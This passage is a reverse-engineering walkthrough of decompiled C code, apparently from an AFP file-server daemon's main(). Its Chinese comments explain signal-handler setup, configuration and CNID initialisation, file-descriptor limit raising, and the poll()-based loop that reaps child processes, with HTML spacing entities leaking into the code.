      v55=strerror(*v54);         // 转换为错误字符串
      v41="main: server_child alloc: %s";
      v42=v55;
      v43=214;                    // 对应源码行号 214
      gotoLABEL_101;               // 记录日志后 exit(3)
    }
    gotoLABEL_96;                  // 静默退出
  }

  /* ══════════════════════════════════════════════
   * 二、信号处理初始化
   *
   * 设计思路：
   *   - 使用 sa_mask 在各信号处理期间屏蔽其他信号，防止重入
   *   - SA_RESTART(0x10000000) 让被信号中断的系统调用自动重启
   * ══════════════════════════════════════════════ */

  // 清空信号集，用于后续 pthread_sigmask 调用
  sigemptyset(&set);
  // SIG_BLOCK=2：暂时阻塞空集合（实质是初始化/同步操作）
  pthread_sigmask(2, &set, 0);

  // 将整个 sigaction 结构清零（含 sa_mask 的128字节）
  memset(&act.sa_mask, 0, 0x90u);

  /* ── 2.1 SIGURG (25)：忽略 TCP 紧急数据信号 ── */
  // &dword_0 + 1 = 地址1 = SIG_IGN（忽略该信号）
  act.sa_handler= (__sighandler_t)(&dword_0+1);
  sigemptyset(&act.sa_mask);
&nbsp;&nbsp;if&nbsp;(&nbsp;sigaction(25,&nbsp;&act,&nbsp;0)&nbsp;<0&nbsp;)
&nbsp; {
&nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298>1&nbsp;)
&nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp;&nbsp;v52=__errno_location();
&nbsp; &nbsp; &nbsp;&nbsp;v53=strerror(*v52);
&nbsp; &nbsp; &nbsp;&nbsp;v41="main: sigaction: %s";
&nbsp; &nbsp; &nbsp;&nbsp;v42=v53;
&nbsp; &nbsp; &nbsp;&nbsp;v43=228;
&nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_101;
&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;gotoLABEL_96;
&nbsp; }

&nbsp;&nbsp;/* ── 2.2 SIGPIPE (13)：忽略管道断开信号 ── */
&nbsp;&nbsp;// 客户端断开连接时内核会发 SIGPIPE，必须忽略否则进程退出
&nbsp;&nbsp;act.sa_handler=&nbsp;(__sighandler_t)(&dword_0+1); &nbsp;// SIG_IGN
&nbsp;&nbsp;sigemptyset(&act.sa_mask);
&nbsp;&nbsp;if&nbsp;(&nbsp;sigaction(13,&nbsp;&act,&nbsp;0)&nbsp;<0&nbsp;)
&nbsp; {
&nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298>1&nbsp;)
&nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp;&nbsp;v50=__errno_location();
&nbsp; &nbsp; &nbsp;&nbsp;v51=strerror(*v50);
&nbsp; &nbsp; &nbsp;&nbsp;v41="main: sigaction: %s";
&nbsp; &nbsp; &nbsp;&nbsp;v42=v51;
&nbsp; &nbsp; &nbsp;&nbsp;v43=236;
&nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_101;
&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;gotoLABEL_96;
&nbsp; }

&nbsp;&nbsp;/* ── 2.3 SIGCHLD (17)：子进程退出通知 ── */
&nbsp;&nbsp;// sub_28340 是真正的 SIGCHLD 处理函数（设置 dword_25C5B0 标志位）
&nbsp;&nbsp;act.sa_handler=&nbsp;(__sighandler_t)sub_28340;
&nbsp;&nbsp;sigemptyset(&act.sa_mask);
&nbsp;&nbsp;// 处理 SIGCHLD 期间屏蔽以下信号，防止重入：
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;14); &nbsp;// SIGALRM
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;1); &nbsp;&nbsp;// SIGHUP
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;15); &nbsp;// SIGTERM
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;10); &nbsp;// SIGUSR1
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;3); &nbsp;&nbsp;// SIGQUIT
&nbsp;&nbsp;act.sa_flags=0x10000000; &nbsp; &nbsp;// SA_RESTART：系统调用被中断后自动重启
&nbsp;&nbsp;if&nbsp;(&nbsp;sigaction(17,&nbsp;&act,&nbsp;0)&nbsp;<0&nbsp;)
&nbsp; {
&nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298<=1&nbsp;)
&nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_96;
&nbsp; &nbsp;&nbsp;v39=__errno_location();
&nbsp; &nbsp;&nbsp;v40=strerror(*v39);
&nbsp; &nbsp;&nbsp;v41="main: sigaction: %s";
&nbsp; &nbsp;&nbsp;v42=v40;
&nbsp; &nbsp;&nbsp;v43=250;
&nbsp; &nbsp;&nbsp;gotoLABEL_101;
&nbsp; }

&nbsp;&nbsp;/* ── 2.4 SIGUSR1 (10)：用户自定义信号1（触发配置重载）── */
&nbsp;&nbsp;sigemptyset(&act.sa_mask);
&nbsp;&nbsp;// 处理 SIGUSR1 期间屏蔽：SIGALRM SIGTERM SIGHUP SIGCHLD SIGQUIT
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;14);
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;15);
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;1);
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;17);
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;3);
&nbsp;&nbsp;act.sa_flags=0x10000000;
&nbsp;&nbsp;if&nbsp;(&nbsp;sigaction(10,&nbsp;&act,&nbsp;0)&nbsp;<0&nbsp;)
&nbsp; {
&nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298>1&nbsp;)
&nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp;&nbsp;v48=__errno_location();
&nbsp; &nbsp; &nbsp;&nbsp;v49=strerror(*v48);
&nbsp; &nbsp; &nbsp;&nbsp;v41="main: sigaction: %s";
&nbsp; &nbsp; &nbsp;&nbsp;v42=v49;
&nbsp; &nbsp; &nbsp;&nbsp;v43=262;
&nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_101;
&nbsp; &nbsp; }
LABEL_96:
&nbsp; &nbsp;&nbsp;exit(3); &nbsp;&nbsp;// 致命错误：退出码 3
&nbsp; }

&nbsp;&nbsp;/* ── 2.5 SIGHUP (1)：重新加载配置文件 ── */
&nbsp;&nbsp;sigemptyset(&act.sa_mask);
&nbsp;&nbsp;// 处理 SIGHUP 期间屏蔽：SIGALRM SIGTERM SIGUSR1 SIGCHLD SIGQUIT
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;14);
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;15);
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;10);
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;17);
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;3);
&nbsp;&nbsp;act.sa_flags=0x10000000;
&nbsp;&nbsp;if&nbsp;(&nbsp;sigaction(1,&nbsp;&act,&nbsp;0)&nbsp;<0&nbsp;)
&nbsp; {
&nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298>1&nbsp;)
&nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp;&nbsp;v56=__errno_location();
&nbsp; &nbsp; &nbsp;&nbsp;v57=strerror(*v56);
&nbsp; &nbsp; &nbsp;&nbsp;v41="main: sigaction: %s";
&nbsp; &nbsp; &nbsp;&nbsp;v42=v57;
&nbsp; &nbsp; &nbsp;&nbsp;v43=274;
&nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_101;
&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;gotoLABEL_96;
&nbsp; }

&nbsp;&nbsp;/* ── 2.6 SIGTERM (15)：优雅终止服务 ── */
&nbsp;&nbsp;sigemptyset(&act.sa_mask);
&nbsp;&nbsp;// 处理 SIGTERM 期间屏蔽：SIGALRM SIGHUP SIGUSR1 SIGCHLD SIGQUIT
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;14);
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;1);
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;10);
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;17);
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;3);
&nbsp;&nbsp;act.sa_flags=0x10000000;
&nbsp;&nbsp;if&nbsp;(&nbsp;sigaction(15,&nbsp;&act,&nbsp;0)&nbsp;<0&nbsp;)
&nbsp; {
&nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298>1&nbsp;)
&nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp;&nbsp;v46=__errno_location();
&nbsp; &nbsp; &nbsp;&nbsp;v47=strerror(*v46);
&nbsp; &nbsp; &nbsp;&nbsp;v41="main: sigaction: %s";
&nbsp; &nbsp; &nbsp;&nbsp;v42=v47;
&nbsp; &nbsp; &nbsp;&nbsp;v43=286;
LABEL_101:
&nbsp; &nbsp; &nbsp;&nbsp;// 统一错误日志入口：级别2(WARN)，设施3，文件main.c，行号v43
&nbsp; &nbsp; &nbsp;&nbsp;make_log_entry(2,&nbsp;3,&nbsp;"main.c",&nbsp;v43,&nbsp;v41,&nbsp;v42);
&nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_96; &nbsp; &nbsp;// 记录日志后 exit(3)
&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;gotoLABEL_96;
&nbsp; }

&nbsp;&nbsp;/* ── 2.7 SIGQUIT (3)：立即退出 ── */
&nbsp;&nbsp;sigemptyset(&act.sa_mask);
&nbsp;&nbsp;// 处理 SIGQUIT 期间屏蔽：SIGALRM SIGHUP SIGUSR1 SIGCHLD SIGTERM
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;14);
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;1);
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;10);
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;17);
&nbsp;&nbsp;sigaddset(&act.sa_mask,&nbsp;15);
&nbsp;&nbsp;act.sa_flags=0x10000000;
&nbsp;&nbsp;if&nbsp;(&nbsp;sigaction(3,&nbsp;&act,&nbsp;0)&nbsp;<0&nbsp;)
&nbsp; {
&nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298<=1&nbsp;)
&nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_96;
&nbsp; &nbsp;&nbsp;v44=__errno_location();
&nbsp; &nbsp;&nbsp;v45=strerror(*v44);
&nbsp; &nbsp;&nbsp;v41="main: sigaction: %s";
&nbsp; &nbsp;&nbsp;v42=v45;
&nbsp; &nbsp;&nbsp;v43=298;
&nbsp; &nbsp;&nbsp;gotoLABEL_101;
&nbsp; }

&nbsp;&nbsp;/* ══════════════════════════════════════════════
&nbsp; &nbsp;* 三、服务初始化
&nbsp; &nbsp;* ══════════════════════════════════════════════ */

&nbsp;&nbsp;// 解除对 SIGALRM/SIGHUP/SIGUSR1/SIGCHLD 的临时屏蔽（SIG_UNBLOCK=0）
&nbsp;&nbsp;// 现在信号处理器已全部注册完毕，可以安全接收信号
&nbsp;&nbsp;sigemptyset(&set);
&nbsp;&nbsp;sigaddset(&set,&nbsp;14); &nbsp;&nbsp;// SIGALRM
&nbsp;&nbsp;sigaddset(&set,&nbsp;1); &nbsp; &nbsp;// SIGHUP
&nbsp;&nbsp;sigaddset(&set,&nbsp;10); &nbsp;&nbsp;// SIGUSR1
&nbsp;&nbsp;sigaddset(&set,&nbsp;17); &nbsp;&nbsp;// SIGCHLD
&nbsp;&nbsp;pthread_sigmask(0,&nbsp;&set,&nbsp;0); &nbsp;// SIG_UNBLOCK=0

&nbsp;&nbsp;// 初始化服务器配置（创建监听socket、绑定端口等）
&nbsp;&nbsp;// 返回非0表示没有配置任何服务
&nbsp;&nbsp;if&nbsp;( (unsignedint)configinit(&unk_25C5C0) )
&nbsp; {
&nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298<=1&nbsp;)
&nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_44;
&nbsp; &nbsp;&nbsp;v37="main: no servers configured";
&nbsp; &nbsp;&nbsp;v38=327;
&nbsp; &nbsp;&nbsp;gotoLABEL_94; &nbsp;&nbsp;// 记录日志后 exit(2)
&nbsp; }

&nbsp;&nbsp;// 重新阻塞上述信号（SIG_BLOCK=1），保护后续初始化不被信号打断
&nbsp;&nbsp;pthread_sigmask(1,&nbsp;&set,&nbsp;0); &nbsp;// SIG_BLOCK=1

&nbsp;&nbsp;// 初始化 CNID（Catalog Node ID）子系统
&nbsp;&nbsp;// CNID 是 AFP 协议中用于持久标识文件/目录的唯一编号机制
&nbsp;&nbsp;cnid_init();

&nbsp;&nbsp;// 初始化异步事件（socket）处理器（sub_28480 内部调用 asev_init 等）
&nbsp;&nbsp;// 返回0表示失败
&nbsp;&nbsp;if&nbsp;(&nbsp;!(unsigned__int8)sub_28480() )
&nbsp; {
&nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298>1&nbsp;)
&nbsp; &nbsp; &nbsp;&nbsp;make_log_entry(2,&nbsp;3,&nbsp;"main.c",&nbsp;337,&nbsp;"main: couldn't initialize socket handler",&nbsp;v4);
&nbsp; &nbsp;&nbsp;gotoLABEL_44; &nbsp;// exit(2)
&nbsp; }

&nbsp;&nbsp;/* ── 3.1 提升文件描述符上限 ── */
&nbsp;&nbsp;// 读取当前进程的最大打开文件数限制
&nbsp;&nbsp;v5=getrlimit64(RLIMIT_NOFILE,&nbsp;&rlimits);
&nbsp;&nbsp;v6=__errno_location();
&nbsp;&nbsp;v7=v6; &nbsp;// v7 长期持有 errno 指针，主循环中复用

&nbsp;&nbsp;if&nbsp;(&nbsp;!v5&nbsp;) &nbsp;// getrlimit 成功
&nbsp; {
&nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;rlimits.rlim_cur>0xFFFE&nbsp;)
&nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_16; &nbsp;// 已经够大（>65534），跳过调整

&nbsp; &nbsp;&nbsp;// 将软限制和硬限制都提升到 65535（0xFFFF）
&nbsp; &nbsp;&nbsp;rlimits.rlim_cur=0xFFFF;
&nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;rlimits.rlim_max<=0xFFFE&nbsp;)
&nbsp; &nbsp; &nbsp;&nbsp;rlimits.rlim_max=0xFFFF;

&nbsp; &nbsp;&nbsp;// 应用新限制；失败时仅记录警告，不退出
&nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;!setrlimit64(RLIMIT_NOFILE,&nbsp;&rlimits)&nbsp;||&nbsp;(unsignedint)dword_245298<=2&nbsp;)
&nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_16;
&nbsp; &nbsp;&nbsp;v15=strerror(*v7);
&nbsp; &nbsp;&nbsp;v16="setlimits: increasing limits failed: %s";
&nbsp; &nbsp;&nbsp;v17=v15;
&nbsp; &nbsp;&nbsp;v18=182;
&nbsp; &nbsp;&nbsp;gotoLABEL_88; &nbsp;// 记录 DEBUG 级别日志
&nbsp; }

&nbsp;&nbsp;// getrlimit 调用本身失败（非常罕见）
&nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298>2&nbsp;)
&nbsp; {
&nbsp; &nbsp;&nbsp;v36=strerror(*v6);
&nbsp; &nbsp;&nbsp;v16="setlimits: reading current limits failed: %s";
&nbsp; &nbsp;&nbsp;v17=v36;
&nbsp; &nbsp;&nbsp;v18=174;
LABEL_88:
&nbsp; &nbsp;&nbsp;// 级别3(INFO)，记录资源限制操作的日志
&nbsp; &nbsp;&nbsp;make_log_entry(3,&nbsp;3,&nbsp;"main.c",&nbsp;v18,&nbsp;v16,&nbsp;v17);
&nbsp; }

&nbsp;&nbsp;/* ══════════════════════════════════════════════
&nbsp; &nbsp;* 四、主事件循环
&nbsp; &nbsp;*
&nbsp; &nbsp;* 架构：基于 poll() 的 I/O 多路复用
&nbsp; &nbsp;* &nbsp; - 外层 for 循环：配置重载后重新进入
&nbsp; &nbsp;* &nbsp; - 中层 while(1)：处理信号驱动的配置重载（SIGHUP/SIGUSR1）
&nbsp; &nbsp;* &nbsp; - 内层 while(1)：处理 poll() 错误（errno==EINTR 时继续）
&nbsp; &nbsp;* &nbsp; - 事件分发：遍历所有就绪的 fd，区分新连接和IPC消息
&nbsp; &nbsp;* ══════════════════════════════════════════════ */

LABEL_16:
&nbsp;&nbsp;for&nbsp;(&nbsp;i=qword_25C5A8; ;&nbsp;i=qword_25C5A8&nbsp;) &nbsp;// qword_25C5A8 = 事件循环结构指针
&nbsp; {
&nbsp; &nbsp;&nbsp;while&nbsp;(&nbsp;1&nbsp;) &nbsp;// 中层：处理配置重载标志
&nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp;&nbsp;while&nbsp;(&nbsp;1&nbsp;) &nbsp;// 内层：poll 调用与信号检查
&nbsp; &nbsp; &nbsp; {
LABEL_17:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 在 poll() 调用前先解除信号屏蔽（SIG_UNBLOCK），
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 确保 poll 期间能接收 SIGCHLD 等信号
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;pthread_sigmask(1,&nbsp;&set,&nbsp;0); &nbsp;&nbsp;// SIG_BLOCK — 注：此处屏蔽集合是
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// {SIGALRM,SIGHUP,SIGUSR1,SIGCHLD}

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 阻塞等待任意 fd 就绪（timeout=-1 表示无限等待）
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// *(pollfd**)i &nbsp; = pollfd 数组指针
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// *(int*)(i+20) &nbsp;= pollfd 数组长度（fd 数量）
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v9=poll(*(structpollfd**)i,&nbsp;*(int*)(i+20),&nbsp;-1);

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// poll 返回后重新屏蔽信号，保护后续处理
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;pthread_sigmask(0,&nbsp;&set,&nbsp;0); &nbsp;&nbsp;// SIG_UNBLOCK

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/* ── 4.1 SIGCHLD 处理：回收退出的子进程 ── */
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v3=&nbsp;(unsignedint)dword_25C5B0;
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;dword_25C5B0&nbsp;) &nbsp;// SIGCHLD 处理器（sub_28340）设置了此标志
&nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;dword_25C5B0=0; &nbsp;// 清除标志，防止重复处理

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 循环回收所有已退出的子进程（WNOHANG=1，非阻塞）
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;while&nbsp;(&nbsp;1&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// waitpid(-1, ..., WNOHANG)：等待任意子进程，不阻塞
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// rlimits 在此处复用为 wstatus 存储区（联合体复用栈空间）
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v22=waitpid(-1, (int*)&rlimits,&nbsp;1);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (int)v22<=0&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_38; &nbsp;&nbsp;// 没有更多已退出子进程，跳出

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/* 分析子进程退出状态（POSIX wstatus 解码）：
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;* &nbsp; 低7位 = 信号编号（非0表示被信号杀死）
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;* &nbsp; 第8位 = core dump 标志
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;* &nbsp; 高8位（byte1）= exit code */
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (rlimits.rlim_cur&0x7F)&nbsp;!=0&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 被信号杀死
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (char)((rlimits.rlim_cur&0x7F)&nbsp;+1)&nbsp;>1&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 信号编号 > 0：被特定信号杀死（如 SIGKILL）
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298<=4&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_57;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v24="child[%d]: killed by signal %d";
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v25=v22;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v26=154;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_64;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 信号编号 = 0x7F（停止信号，如 SIGSTOP）？异常情况
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298>4&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v25=v22;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v24="child[%d]: died";
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v26=156;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_64;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;else
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 正常退出（exit()调用）
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;BYTE1(rlimits.rlim_cur) )
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 退出码非0：异常退出
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298<=4&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_57;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v25=v22;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v24="child[%d]: exited %d";
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v26=149;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_64;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 退出码为0：正常完成
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298>4&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v24="child[%d]: done";
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v25=v22;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v26=151;
LABEL_64:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 级别5(DEBUG)记录子进程退出信息
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;make_log_entry(5,&nbsp;3,&nbsp;"main.c",&nbsp;v26,&nbsp;v24,&nbsp;v25);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
LABEL_57:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 从子进程管理表中移除该子进程，获取其 IPC fd
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v23=server_child_remove(qword_25C5B8,&nbsp;v22);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 如果有有效的 IPC fd，从事件循环中删除
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;v23!=-1&&!(unsigned__int8)asev_del_fd(qword_25C5A8,&nbsp;v23)&nbsp;&&&nbsp;(unsignedint)dword_245298>1&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;make_log_entry(2,&nbsp;3,&nbsp;"main.c",&nbsp;164,&nbsp;"child[%d]: asev_del_fd: %d",&nbsp;v22);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v10=*v7; &nbsp;// 保存当前 errno（poll 可能修改了它）

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/* ── 4.2 SIGHUP/SIGUSR1 处理：重载配置 ── */
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;!dword_25C5B4&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break; &nbsp;// 无重载标志，跳出内层循环进行正常事件处理

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 有重载请求：先禁止新连接（增加 nologin 计数器）
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v19=qword_25C5D8; &nbsp;&nbsp;// 服务器链表头指针（DSI server列表）
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;++nologin; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// nologin > 0 时，新连接将被拒绝

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;qword_25C5D8&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 遍历所有服务器，从事件循环中移除监听 socket
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// offset 67352 处存储着监听 socket 的 fd
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;while&nbsp;( (unsigned__int8)asev_del_fd(qword_25C5A8,&nbsp;*(unsignedint*)(v19+67352)) )
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v19=*(_QWORD*)v19; &nbsp;// 下一个服务器节点
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;!v19&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_45; &nbsp; &nbsp; &nbsp;&nbsp;// 全部移除成功
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// asev_del_fd 失败（返回0）：记录错误并退出
